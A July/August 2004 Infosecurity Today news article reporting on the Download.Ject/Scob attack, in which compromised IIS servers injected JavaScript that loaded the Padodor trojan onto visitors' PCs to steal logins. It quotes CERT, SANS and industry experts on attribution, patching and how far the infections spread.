US government and industry experts voiced
fears on the week ending 25 June of an
impending massive attack that combined
hacking, malcode-injection, and spamming.
However, the attack was thwarted when
Internet engineers shut down a Russian server
that had been delivering the ‘Padodor trojan’,
and other malicious components.
F-Secure has said that the Trojan
downloaded to PCs from compromised IIS
servers was almost certainly the work of
HangUP, whose trademark term, 'Padonok',
was discovered in the code.
"Unless they provided their Padodor source
code to someone else (which is doubtful), they
are responsible for the latest Padodor/Qukart
incidents," said F-Secure in a statement.
For sure, the attack is evidence of an
underground trend that will not go away, as
hackers turn home and corporate PCs into
relay points for spam.
The attack ran like this. US-CERT declared
itself aware, on 25 June, of 'new activity
affecting compromised web sites running Micro-
soft's Internet Information Server (IIS) 5 and
possibly end-user systems that visit these sites'.
The agency reported that 'compromised
sites are appending JavaScript to the bottom
of web pages', which, when executed attempts
to access a file hosted on another server. This
file may contain malicious code that can
affect the end-user's system'.
Once the hackers break into a site, files
were modified, and a Trojan downloader
called "Scob" or "Download.Ject" was
appended to the files causing IE to execute it.
The web site visitor did (and does) not have to
click on any links. Just visiting an infected site
will trigger the exploit.
The Trojan horse, which was surreptitiously
downloaded to machines running Internet
Explorer from infected Internet Information
Services (IIS) servers, watched for log-in
information for prominent sites such as
PayPal, eBay, EarthLink, and Yahoo, then
attempted to steal confidential financial
information, such as credit card numbers.
Still other reports say that the hackers
behind the malware were actually loading
computers with adware or spamware —
software that can push unwanted ads to users
or steal personal data for the purpose of
spamming.
Phillip Hallam-Baker, principal scientist,
VeriSign Security Services commented that
"the CERT description was somewhat unclear.
It was reported as an IIS issue, but the
description given mentioned JavaScript code
being appended to web pages to attack
customers. That would make it a description
of an exploit, rather than a description of a
vulnerability.
"What is significant here is that web site
compromises have moved beyond merely
vandalizing the site to victimizing the user of
the site.
"The advisory is right to point out that
people can protect themselves by turning off
JavaScript, but unfortunately JavaScript use is
widespread. I hope that people don't read the
advisory and then conclude that security
problems are the fault of the user."
Meanwhile, Microsoft said it was
investigating a report of a security issue
known as Download.Ject affecting customers
using Microsoft Internet Information Services
5.0 (IIS) and Microsoft Internet Explorer.
It urged web administrators to apply update
835732, which was addressed by MS04-011.
However, it is still unclear whether this will
do the trick. The Sans Internet Storm Center
said that several server administrators
reported that they were fully patched, and yet
also breached.
'We do not know at this point how the
affected servers have been compromised', the
Center's alert said on 25 June. 'The SSL-PCT
exploit is at the top of our list of suspects. If
you find a compromised server, we strongly
recommend a complete rebuild. You may be
able to get your web site back into business by
changing the footer setting and removing the
JavaScript file. But this is a very sophisticated
attack and you should expect other stealthy
backdoors.'
Hallam-Baker said that it was "unfortunate
that this was reported as an IIS issue since it is
a development that all Web server
administrators should be aware of. Whatever
server you are running, your site may be used
to attack your customers if it is
compromised."
Confusion was also rife over how
widespread the infections were. According to
Marty Lidner, an incident-handling team
leader at the CERT Coordination Center:
"CERT found infections on about 100 Web
sites of varying sizes [on 27 June] and
informed their operators of the problem. But
many other Web sites are likely to be infected
that CERT is unaware of."
Jay Heiser, analyst at TruSecure said: "it is
too early to really have a firm opinion on
exactly what happened, and its significance.
The dust hasn't cleared on this one yet.
"However, JavaScript, like virtually all other
forms of mobile code, is not as carefully
designed as Java itself, and is vulnerable to
exploit. Microsoft's choice of integrating
Internet-delivered mobile code with desktop
capability has provided unprecedented levels
of convenience and power … but this failure is
typical of the types of failure that are
inevitable with this model.
"We will continue to see failures like this,
and it is reasonable to assume that some of
them will be more serious than this latest
one", he added.
Hallam-Baker commented that "organized
crime is certainly involved in a large number
of hacking attacks. This tends to be a
tautology though since computer crimes
typically involve several people. Certainly
there are groups of hackers in several former
USSR/eastern bloc countries who perform
extortion rackets.
"Whoever is behind this appears to be
interested in targeting ordinary users of the
web. Regardless of the nationality, these
appear to be dark forces."
By 9 July, Websense, an enterprise software
firm, had discovered 114 web sites distributing
the malicious JavaScript programme — two
weeks after the first sighting. It’s not over yet.
ne
ws
6In
fosecu
rity Tod
ayJuly/A
ugust 2004
Russia-based attack averted but sign of dark things to comeBrian McKenna
Hallam-Baker: dark forces at work
Recommended
